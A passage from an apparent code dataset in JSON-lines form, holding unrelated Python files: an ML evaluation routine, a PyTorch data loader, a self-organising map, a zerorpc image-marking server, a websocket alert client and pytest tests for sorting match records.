short_pref_weight = short_pref_weight.cuda()\r\n long_pref_weight = long_pref_weight.unsqueeze(1)\r\n short_pref_weight = short_pref_weight.unsqueeze(1)\r\n if self.use_hist_attention:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * (attention * torch.exp(torch.neg(delta) * d_time) * h_time_mask).unsqueeze(2)).sum(\r\n dim=1)\r\n else:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * (torch.exp(torch.neg(delta) * d_time) * h_time_mask).unsqueeze(2)).sum(dim=1)\r\n\r\n rate_all_sum = 0\r\n recall_all = np.zeros(self.top_n)\r\n MRR_all = np.zeros(self.top_n)\r\n\r\n t_nodes_list = t_nodes.cpu().numpy().tolist()\r\n p_lambda_numpy = p_lambda.cpu().numpy()\r\n for i in range(len(t_nodes_list)):\r\n t_node = t_nodes_list[i]\r\n p_lambda_numpy_i_item = p_lambda_numpy[i]\r\n prob_index = np.argsort(-p_lambda_numpy_i_item).tolist()\r\n gnd_rate = prob_index.index(t_node) + 1\r\n rate_all_sum += gnd_rate\r\n if gnd_rate <= self.top_n:\r\n recall_all[gnd_rate - 1:] += 1\r\n MRR_all[gnd_rate - 1:] += 1. / gnd_rate\r\n return rate_all_sum, recall_all, MRR_all\r\n\r\n def save_parameter_value(self, path, parameter, data_type):\r\n if torch.cuda.is_available():\r\n parameter_cpu = parameter.cpu().data.numpy()\r\n else:\r\n parameter_cpu = parameter.data.numpy()\r\n writer = open(path, 'w')\r\n if data_type == \"vector\":\r\n writer.write('%d\\n' % (parameter_cpu.shape[0]))\r\n writer.write('\\t'.join(str(d) for d in parameter_cpu))\r\n elif data_type == \"matrix\":\r\n dim_0, dim_1 = parameter_cpu.shape\r\n writer.write('%d\\t%d\\n' % (dim_0, dim_1))\r\n for n_idx in range(dim_0):\r\n writer.write('\\t'.join(str(d) for d in parameter_cpu[n_idx]) + '\\n')\r\n else:\r\n pass\r\n writer.close()","repo_name":"dongjingWANG/MHPE_github","sub_path":"Model_new_user_attention3.py","file_name":"Model_new_user_attention3.py","file_ext":"py","file_size_in_byte":19057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16778613287","text":"#\n# -*- coding:utf-8 -*-\n\nimport numpy as np\n\nfrom PIL import Image\n\n\n# 计算A2 + B3,其中,A和B是一维数组\ndef pySum():\n a = [0, 1, 2, 3, 4]\n b = [9, 8, 7, 6, 5]\n c = []\n for i in range(len(a)):\n c.append(a[i] ** 2 + b[i] ** 3)\n return c\n\ndef npSum():\n a = np.array([0, 1, 2, 3, 4])\n b = np.array([9, 8, 7, 6, 5])\n\n c = a**2 + b**3\n return c\n\ndef show_image():\n filepath = \"./shida.jpg\"\n im1 = np.array(Image.open(filepath))\n im2 = np.array(Image.open(filepath).convert(\"L\"))\n print(im1.shape, im1.dtype)\n # print(im2)\n # 保存灰度图像\n im2 = Image.fromarray(im2)\n im2.save(\"./shida-hui.jpg\")\n\n\nif __name__ == '__main__':\n # print(pySum())\n # print(npSum())\n show_image()","repo_name":"xiaowu5759/datatrain","sub_path":"01-numpytrain.py","file_name":"01-numpytrain.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20428477831","text":"from ..Utilities import _\n\ncata_msg = {\n 1: _(\n \"\"\"\nL'unique occurrence de RITZ doit obligatoirement contenir MODE_MECA.\nSi BASE_MODALE est utilisée, il faut aussi donner les modes d'interface par MODE_INTF.\nEt si on veut MODE_INTF uniquement, il faut quand même ajouter une 2ème occurrence\nde RITZ avec MODE_MECA et NMAX_MODE mis à 0.\n\"\"\"\n ),\n 2: _(\n \"\"\"\nLa base modale est composée de vecteurs complexes. Pour la projection, seule leur partie réelle\nsera utilisée. \n\"\"\"\n ),\n 9: _(\"\"\"Le mot-clé NUME_REF est obligatoire quand DEFI_BASE_MODALE n'est pas ré-entrant.\"\"\"),\n 31: _(\n \"\"\"\nIl y a un problème de cohérence entre le nombre de concepts MODE_MECA et la liste\ndes NMAX_MODE:\n Nombre de concepts MODE_MECA dans la liste MODE_MECA : %(i1)d\n Nombre de valeurs de la liste NMAX_MODE : %(i2)d\n Les deux listes doivent avoir la même taille.\n\"\"\"\n ),\n 50: _(\"\"\"Le total des modes défini dans RITZ est nul. Il faut au moins un mode.\"\"\"),\n 51: _(\n \"\"\"\nDeux occurrences de RITZ doivent obligatoirement et exactement contenir une fois\nle mot-clé MODE_INTF. Les autres possibilités ne sont pas autorisées.\n\"\"\"\n ),\n}\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Messages/defibasemodale1.py","file_name":"defibasemodale1.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15237052209","text":"#!/usr/bin/python\n\nimport sys\n\nzipcodes=[]\nflights={}\n\ndef solve(path,avail):\n #Try to solve the problem given that we have started with the given path\n #and avail indicates whether we can fly outbound from each city in that path\n if len(path)==len(zipcodes):\n return path\n #Compute list of unvisited cities we can reach and sort by zip code\n reachable=[]\n for j in xrange(len(path)):\n if avail[j]:\n for flight in flights[path[j]]:\n if flight not in path and flight not in reachable:\n reachable.append((zipcodes[flight-1],flight))\n reachable.sort()\n #For each reachable city, figure out how far back in our path we have to\n #return to get to it, and go there, until we find a solution\n for zip,city in reachable:\n navail=avail[:]\n for j in xrange(len(path)-1,-1,-1):\n if navail[j]:\n if city in flights[path[j]]:\n break\n else:\n navail[j]=False\n navail.append(True)\n x=solve(path+[city],navail)\n if x is not None:\n return x\n #failure\n return None\n \n\nt=int(sys.stdin.readline())\nfor caseno in xrange(t):\n lin=sys.stdin.readline().split()\n n=int(lin[0])\n m=int(lin[1])\n zipcodes=[]\n reachable=[]\n for j in xrange(n):\n zip=sys.stdin.readline().strip()\n zipcodes.append(zip)\n reachable.append((zip,j+1))\n reachable.sort()\n flights={}\n for j in xrange(n):\n flights[j+1]=[]\n for j in xrange(m):\n lin=sys.stdin.readline().split()\n i=int(lin[0])\n j=int(lin[1])\n flights[i].append(j)\n flights[j].append(i)\n #try each starting city\n for zip,city in reachable:\n x=solve([city],[True])\n if x is not None:\n #solved\n res=\"\"\n for city in x:\n res+=zipcodes[city-1]\n sys.stdout.write(\"Case #\"+repr(caseno+1)+\": \"+res+\"\\n\")\n break\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/14/23/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"2983139274","text":"from django.contrib import admin\n\nfrom home.models import message\n\n# Register your models here.\n@admin.register(message)\nclass messageAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"message\", \"contact\", \"email\")\n list_filter = (\"contact\",)\n search_fields = [\"name\"]","repo_name":"suyogojha/BulkMsg_token","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"23476898810","text":"import torch.utils.data as data\n\nfrom PIL import Image\nimport numpy as np\nimport random\n\nimport os\nimport os.path\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef find_classes(dir):\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ndef make_dataset(dir, class_to_idx, ages, extensions):\n persons = []\n dir = os.path.expanduser(dir)\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n person = []\n for fname in sorted(fnames):\n if has_file_allowed_extension(fname, extensions):\n path = os.path.join(root, fname)\n age = int(fname.split('_')[-1].split('.')[0])\n item = (path, age_to_class(age, ages))\n person.append(item)\n\n persons.append(person)\n\n return persons\n\ndef age_to_class(age, ages):\n for i, _age in enumerate(ages):\n if age <= _age:\n return i\n return len(ages)\n\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']\n\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n import accimage\n try:\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\nclass AgePairDataFolder(data.Dataset):\n\n def __init__(self, root, ages=[10, 18, 30, 40, 50, 60], loader=default_loader, extensions=IMG_EXTENSIONS, transform=None, target_transform=None):\n self.ages = ages\n persons, person_to_idx = find_classes(root)\n samples = make_dataset(root, person_to_idx, ages, extensions)\n if len(samples) == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(extensions)))\n\n self.root = root\n self.loader = loader\n self.extensions = extensions\n\n self.samples = samples\n\n self.transform = transform\n self.target_transform = target_transform\n\n def get_p_example(self, person):\n index = random.randrange(len(person))\n path, target = person[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return (sample, target)\n\n def get_n_example(self, person):\n index = random.randrange(len(person))\n path, target = person[index]\n target = (target + random.randrange(1, len(self.ages)+1)) % (len(self.ages)+1)\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return (sample, target)\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n personA = self.samples[index]\n _index = (index + random.randrange(1, len(self.samples))) % len(self.samples)\n personB = self.samples[_index]\n pExample1, pExample2 = self.get_p_example(personA), self.get_p_example(personA)\n nExample1, nExample2 = self.get_p_example(personA), self.get_p_example(personB)\n\n return pExample1[0], pExample2[0], pExample1[1], pExample2[1], nExample1[0], nExample2[0], nExample1[1], nExample2[1]\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str","repo_name":"mathfinder/CODE_X","sub_path":"source/datasets/agepairdatafolder.py","file_name":"agepairdatafolder.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2395756166","text":"import os\nimport time\nimport json\nimport jsonpickle\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom src.dataentity import DataEntity\nfrom src.learningasset import LearningAsset\nfrom src.neuron import Neuron\nimport jsonpickle.ext.numpy as jsonpickle_numpy\njsonpickle_numpy.register_handlers()\n\n\nclass SomNetwork(object):\n\n def __init__(self, dataset):\n self.neurons_w_num = dataset.params_num\n self.__network_size(dataset.elements_num)\n self.__neurons_num(dataset.elements_num)\n self.__initialize_input(dataset)\n self.__initalize_output()\n self.winner_coordinates = None\n self.result = None\n # adaptation parameters\n self.sigma_0 = self.network_size - 4\n self.gamma_0 = 1\n self.alfa = 4000\n self.mcolor = np.array([[255, 255, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255]])\n self.population_of_ids = [i for i in range(0, len(self.input))]\n\n def test_fun(self):\n pass\n\n def __str__(self):\n text = 'Network map:\\n'\n for i in range(0, self.network_size):\n for j in range(0, self.network_size):\n text += '({},{}): {} | '.format(i+1, j+1, self.output[i][j])\n text += '\\n'\n\n return text\n\n def get_params_bandwidth(self):\n p = np.array([])\n for item in self.input:\n p = np.append(p, item.params)\n p = p.reshape((len(self.input), self.neurons_w_num))\n l_bound = p.min(axis=0)\n u_bound = p.max(axis=0)\n print(u_bound - l_bound)\n return u_bound - l_bound\n\n def __network_size(self, n):\n \"\"\" returns dimension (N) for the network map (N x N)\n :param n: number of input vectors - dataset records\n \"\"\"\n # self.network_size = int(np.ceil(np.sqrt(5 * np.sqrt(n))))\n self.network_size = 12\n\n def __neurons_num(self, n):\n \"\"\" number of total neurons in the SOM map\n :param n: number of input vectors - dataset records\n \"\"\"\n d = np.ceil(np.sqrt(5 * np.sqrt(n)))\n # self.neurons_num = int(d * d)\n self.neurons_num = 144\n\n def __initialize_input(self, dataset):\n \"\"\" draws only elements from dataset\n :param dataset: instance of LearningAsset class holding data records\n \"\"\"\n self.input = []\n for i in range(0, dataset.elements_num):\n self.input.append(dataset.elements[i])\n\n def __initalize_output(self, fromfile=True):\n \"\"\" builds SOM map of neurons \"\"\"\n # self.read_network_map()\n # self.__show_output(result)\n # self.test_fun()\n # self.read_network_map()\n # print('initialize output')\n\n self.output = np.array([])\n # numpy array of max_i - min_i for every i-parameter\n bandwidth = self.get_params_bandwidth()\n for i in range(0, self.neurons_num):\n self.output = np.append(self.output, Neuron(self.neurons_w_num, bandwidth))\n self.output = np.reshape(self.output, (self.network_size, self.network_size))\n\n # noinspection PyTypeChecker\n def euclidean(self, X, Y):\n \"\"\" Euclidean norm for two numpy.ndarrays X and Y \"\"\"\n return np.sqrt(np.sum((X - Y) ** 2))\n\n def get_norms(self, v):\n norms = []\n self.output = self.output.reshape((1, self.neurons_num))\n for neuron in self.output[0]:\n norms.append(self.euclidean(neuron.weights, v))\n self.output = self.output.reshape((self.network_size, self.network_size))\n return np.array(norms).reshape((self.network_size, self.network_size))\n\n def distance_to_champion(self, n, c, metric):\n if metric == 'taxicab':\n return np.sum(np.abs(n - c))\n else:\n return np.sqrt(np.sum((n - c) ** 2))\n\n def learn(self):\n # # adaptation parameters\n # sigma_0 = self.network_size - 4\n # gamma_0 = 1\n # alfa = 4000\n # mcolor = np.array([[255, 255, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255]])\n #\n # population_of_ids = [i for i in range(0, len(self.input))]\n # rand_ids = random.sample([i for i in range(0, len(self.input))], len(self.input))\n for k in range(0, 10):\n k3 = self.one_step_learn(k, self.sigma_0, self.gamma_0, self.alfa, self.mcolor, self.population_of_ids)\n k4 = k3.reshape((network.network_size, network.network_size, 3))\n # time.sleep(0.2)\n return k4\n\n def one_step_learn(self, k, sigma_0, gamma_0, alfa, mcolor, population_of_ids):\n k3 = np.array([])\n id = random.choice(population_of_ids)\n # those parameters change after every k iteration\n # at first step k == 0 so gamma_0 and sigma_0 are considered valid at first\n gamma = gamma_0 * np.exp(-k / alfa)\n sigma = sigma_0 * np.exp(-k / alfa)\n d = self.input[id]\n # print(self.input[id])\n\n # matix of euclidean norms between neuron weights and input data for every neuron\n norms = self.get_norms(d.params)\n location_of_min = np.argmin(norms)\n\n # compute (i, j) coordinates of maximum value in norms matrix\n self.winner_coordinates = np.array([int(location_of_min / 8), location_of_min % 8])\n # print(k, self.winner_coordinates)\n print('inside: ', k)\n # step over neighbourhood and update\n for i in range(0, self.network_size):\n for j in range(0, self.network_size):\n neighbour = np.array([i, j])\n dn = self.distance_to_champion(neighbour, self.winner_coordinates, 'euclidean')\n if dn < sigma:\n # update neighbours weights\n delta = np.exp((- dn ** 2) / (2 * (sigma ** 2)))\n self.output[i][j].weights += delta * gamma * (d.params - self.output[i][j].weights)\n pass\n k1 = np.dot(self.output[i][j].weights, mcolor)\n # k2 = np.sum(k1, axis=1)\n k3 = np.append(k3, k1)\n k4 = k3.reshape((self.network_size, self.network_size, 3))\n self.result = k4\n return k4\n\n\nif __name__ == '__main__':\n data = LearningAsset()\n data.loadAsset('../data/IrisDataAll.csv')\n # print(data)\n network = SomNetwork(data)\n # print(network.output)\n # network.save_network_map()\n # print('\\nSOM map data was dumped into data/map.json.\\n')\n # network.read_network_map()\n # print('\\nSOM map data was read from data/map.json.\\n')\n\n # im = network.learn()\n # plt.figure()\n # plt.imshow(im)\n # plt.show()\n # print(network)\n\n # mcolor = np.array([[255,255,0],[255,0,0],[0,255,0],[0,0,255]])\n # k3 = np.array([])\n # for i in range(0, network.network_size):\n # for j in range(0, network.network_size):\n # k1 = np.dot(network.output[i][j].weights, mcolor)\n # # k2 = np.sum(k1, axis=1)\n # k3 = np.append(k3, k1)\n # k4 = k3.reshape((network.network_size, network.network_size, 3))\n # # plt.imshow(k4, interpolation='nearest')\n # plt.imshow(k4)\n # plt.show()\n\n # print(network)\n # norms = network.get_norms(network.input[0].params)\n # print(norms)\n # m = np.max(norms)\n # print(m)\n # print(network.output.shape)\n # idx = np.argmax(norms)\n # network.winner_coordinates = [int(idx/8), idx%8]\n # print(idx)\n # print('x - ',idx%8)\n # print('y - ',int(idx/8))\n\n\n\n","repo_name":"airpawel/SOM","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23359203421","text":"# -*- coding: utf-8 -*-\n# 基于[DeepMosaic项目](https://github.com/HypoX64/DeepMosaics)进行剪裁\n# 使用项目提供的预训练模型对图片的ROI区域进行标注\nimport os\nimport sys\nimport imghdr\n\nimport cv2\nimport torch\nimport numpy as np\nimport zerorpc\n\nfrom dm_models import runmodel\nfrom dm_models.BiSeNet_model import BiSeNet\n\nnetF = BiSeNet(num_classes=1, context_path='resnet18',train_flag=False)\nnetX = BiSeNet(num_classes=1, context_path='resnet18',train_flag=False)\nnetF.load_state_dict(torch.load(os.path.join(os.environ['IMAGESERVICE_ROOT'], 'models', 'pretrained_models', 'add_face.pth')))\nnetX.load_state_dict(torch.load(os.path.join(os.environ['IMAGESERVICE_ROOT'], 'models', 'pretrained_models', 'add_youknow.pth')))\nnetF.eval()\nnetX.eval()\n# 不使用GPU\n# netF.cuda()\n# netX.cuda()\n\nclass Opt(object):\n \"\"\"DeepMosaics的默认参数\"\"\"\n def __init__(self):\n self.mask_extend = 10\n self.mask_threshold = 64\n self.mosaic_mod = 'squa_avg'\n self.mosaic_size = 0\n\nclass DeepMosaics_ROIMarker(object):\n def roi_marker(self, image_data, roi_type='face'):\n opt = Opt()\n image_type = imghdr.what(None, image_data)\n img = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n if roi_type == 'face':\n netS = netF\n else:\n netS = netX\n mask, (x,y,w,h)= runmodel.get_ROI_position(img, netS, opt)\n # cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 2)\n # OpenCV 4, findContours返回两个值\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n img = cv2.drawContours(img,contours,-1,(0,255,0),3) \n is_success, im_buf_arr = cv2.imencode(\".\"+image_type, img)\n byte_im = im_buf_arr.tobytes()\n return byte_im\n\n\nif __name__ == \"__main__\":\n s = zerorpc.Server(DeepMosaics_ROIMarker())\n s.bind(\"tcp://0.0.0.0:54334\")\n s.run()\n","repo_name":"linxiaohui/image-service","sub_path":"ROI-Mark/roi_marker.py","file_name":"roi_marker.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"8321046163","text":"from websocket import create_connection\nfrom tkinter import *\nimport json\nimport sys\n\nif (len(sys.argv) < 2):\n exit()\n\nclass Fullscreen_Window:\n\n def __init__(self):\n self.tk = Tk()\n self.tk.attributes('-zoomed', True) # This just maximizes it so we can see the window. It's nothing to do with fullscreen.\n self.frame = Frame(self.tk)\n self.frame.pack()\n self.state = False\n self.tk.bind(\"\", self.toggle_fullscreen)\n self.tk.bind(\"\", self.end_fullscreen)\n\n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.tk.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.tk.attributes(\"-fullscreen\", False)\n return \"break\"\n\ndef dostuff(msg):\n print(msg)\n msg = json.loads(msg)\n title = msg[\"title\"]\n body = msg[\"body\"]\n\n w = Fullscreen_Window()\n w.tk['bg'] = 'red'\n # w.toggle_fullscreen()\n\n l = Label(w.tk, text=\"Incoming Bomb Schedule!!!\", font=(\"Comic Sans\", 30), background=\"red\").pack(fill=\"none\")\n # l.grid(row=0, column=0, padx=(100, 10))\n # l.pack()\n l = Label(w.tk, text=title, font=(\"Comic Sans\", 30), background=\"red\").pack(fill=\"none\")\n l = Label(w.tk, text=body, font=(\"Comic Sans\", 30), background=\"red\").pack()\n Button(w.tk, text=\"⊂(▀¯▀⊂)\", command=w.tk.destroy, font=(\"Comic Sans\", 30)).pack()\n\n import soundcloud\n from urllib.request import urlopen\n\n # create a client object with your app credentials\n client = soundcloud.Client(client_id=\"8a60af37f3a99161bca375510b1ebe55\")\n\n # fetch track to stream\n # track = client.get('/tracks/293')\n\n # find all sounds of buskers licensed under 'creative commons share alike'\n # tracks = client.get('/tracks', q='A meeting in the office')\n tracks = client.get('/tracks', q=title)\n\n print(tracks[0].title)\n\n # get the tracks streaming URL\n stream_url = client.get(tracks[0].stream_url, allow_redirects=False)\n\n # print the tracks stream URL\n print(stream_url.location)\n\n # u = urlopen(stream_url.location)\n\n import vlc\n from vlc import State\n p = vlc.MediaPlayer(stream_url.location)\n p.play()\n # while not p.get_state() == 5:\n # pass\n\n w.tk.mainloop()\n p.stop()\n print(\"Tk exited\")\n\nws = create_connection(\"ws://139.59.162.84:40111\")\nprint(\"Connected\")\nws.send(\"LGN\" + sys.argv[1])\nprint(\"Logged in\")\nwhile(True):\n mess = ws.recv()\n print(mess)\n if mess[:3] == \"ALR\":\n dostuff(mess[3:])\n\n\n# dostuff(\"This is the message\")\n# dostuff(\"apple pie\")\n\n# dostuff(\"{\\\"title\\\": \\\"Apples\\\", \\\"body\\\": \\\"fiji\\\"}\")\n# dostuff(\"{\\\"title\\\": \\\"Apples\\\", \\\"body\\\": \\\"fiji\\\"}\")\n","repo_name":"AnthonyWharton/BombScheduling","sub_path":"clientapps/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10483822388","text":"import csv\nimport datetime\nimport json\nimport random\n\nimport pytest\nfrom google.appengine.ext import ndb\n\nfrom backend.common.consts.alliance_color import AllianceColor\nfrom backend.common.consts.comp_level import CompLevel\nfrom backend.common.consts.event_type import EventType\nfrom backend.common.consts.playoff_type import DoubleElimRound, LegacyDoubleElimBracket\nfrom backend.common.helpers.match_helper import MatchHelper\nfrom backend.common.models.event import Event\nfrom backend.common.models.match import Match\n\n\n@pytest.fixture(autouse=True)\ndef auto_add_ndb_context(ndb_context) -> None:\n pass\n\n\ndef test_natural_sorted_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n\n random.shuffle(matches)\n matches = MatchHelper.natural_sorted_matches(matches)\n # Spot check - f, qf, qm, sf. Matches in comp level should be in order\n spot_check_indexes = [0, 1, 2, 3, 4, 13, 14, 90, 91, 92]\n spot_check_match_keys = [matches[i].key_name for i in spot_check_indexes]\n expected_match_keys = [\n \"2019nyny_f1m1\",\n \"2019nyny_f1m2\",\n \"2019nyny_qf1m1\",\n \"2019nyny_qf1m2\",\n \"2019nyny_qf2m1\",\n \"2019nyny_qm1\",\n \"2019nyny_qm2\",\n \"2019nyny_sf1m1\",\n \"2019nyny_sf1m2\",\n \"2019nyny_sf2m1\",\n ]\n assert spot_check_match_keys == expected_match_keys\n\n\ndef test_organized_matches_counts(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n\n count, organized_matches = MatchHelper.organized_matches(matches)\n assert count == 94\n assert len(organized_matches[CompLevel.QM]) == 77\n assert len(organized_matches[CompLevel.QF]) == 11\n assert len(organized_matches[CompLevel.EF]) == 0\n assert len(organized_matches[CompLevel.SF]) == 4\n assert len(organized_matches[CompLevel.F]) == 2\n\n\ndef test_organized_matches_sorted(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n quals = organized_matches[CompLevel.QM]\n quarters = organized_matches[CompLevel.QF]\n assert all(\n quals[i].match_number <= quals[i + 1].match_number\n for i in range(len(quals) - 1)\n )\n assert all(\n quarters[i].set_number <= quarters[i + 1].set_number\n for i in range(len(quarters) - 1)\n )\n\n\ndef test_organized_legacy_double_elim_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2017wiwi_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_legacy_double_elim_matches(\n organized_matches\n )\n\n assert LegacyDoubleElimBracket.WINNER in double_elim_matches\n assert LegacyDoubleElimBracket.LOSER in double_elim_matches\n\n assert all(\n level in double_elim_matches[LegacyDoubleElimBracket.WINNER]\n for level in [CompLevel.EF, CompLevel.QF, CompLevel.SF, CompLevel.F]\n )\n assert all(\n level in double_elim_matches[LegacyDoubleElimBracket.LOSER]\n for level in [CompLevel.EF, CompLevel.QF, CompLevel.SF, CompLevel.F]\n )\n\n bracket_to_match_keys = {\n bracket: {\n comp_level: [m.short_key for m in matches]\n for comp_level, matches in bracket_matches.items()\n }\n for bracket, bracket_matches in double_elim_matches.items()\n }\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.EF] == [\n \"ef1m1\",\n \"ef2m1\",\n \"ef3m1\",\n \"ef4m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.QF] == [\n \"qf1m1\",\n \"qf2m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.SF] == [\n \"sf1m1\"\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.F] == [\n \"f2m1\",\n \"f2m2\",\n ]\n\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.EF] == [\n \"ef5m1\",\n \"ef6m1\",\n \"ef6m2\",\n \"ef6m3\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.QF] == [\n \"qf3m1\",\n \"qf4m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.SF] == [\n \"sf2m1\"\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.F] == [\"f1m1\"]\n\n\ndef test_organized_double_elim_matches_pre_2023(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2022cctest_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_double_elim_matches(\n organized_matches, 2022\n )\n\n assert len(double_elim_matches) == len(DoubleElimRound)\n for round in DoubleElimRound:\n assert round in double_elim_matches\n\n round_to_match_keys = {\n round: [m.short_key for m in matches]\n for round, matches in double_elim_matches.items()\n }\n assert round_to_match_keys[DoubleElimRound.ROUND1] == [\n \"ef1m1\",\n \"ef2m1\",\n \"ef3m1\",\n \"ef4m1\",\n ]\n assert round_to_match_keys[DoubleElimRound.ROUND2] == [\n \"ef5m1\",\n \"ef6m1\",\n \"qf1m1\",\n \"qf2m1\",\n ]\n assert round_to_match_keys[DoubleElimRound.ROUND3] == [\"qf3m1\", \"qf4m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND4] == [\"sf1m1\", \"sf2m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND5] == [\"f1m1\"]\n assert round_to_match_keys[DoubleElimRound.FINALS] == [\"f2m1\", \"f2m2\", \"f2m3\"]\n\n\ndef test_organized_double_elim_4_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2023micmp_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_double_elim_4_matches(organized_matches)\n\n assert len(double_elim_matches) == 4\n\n round_to_match_keys = {\n round: [m.short_key for m in matches]\n for round, matches in double_elim_matches.items()\n }\n assert round_to_match_keys[DoubleElimRound.ROUND1] == [\"sf1m1\", \"sf2m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND2] == [\"sf3m1\", \"sf4m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND3] == [\"sf5m1\"]\n assert round_to_match_keys[DoubleElimRound.FINALS] == [\"f1m1\", \"f1m2\"]\n\n\ndef test_play_order_sort(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n sorted_matches = MatchHelper.play_order_sorted_matches(matches)\n assert len(sorted_matches) == 94\n assert all(\n sorted_matches[i].play_order <= sorted_matches[i + 1].play_order\n for i in 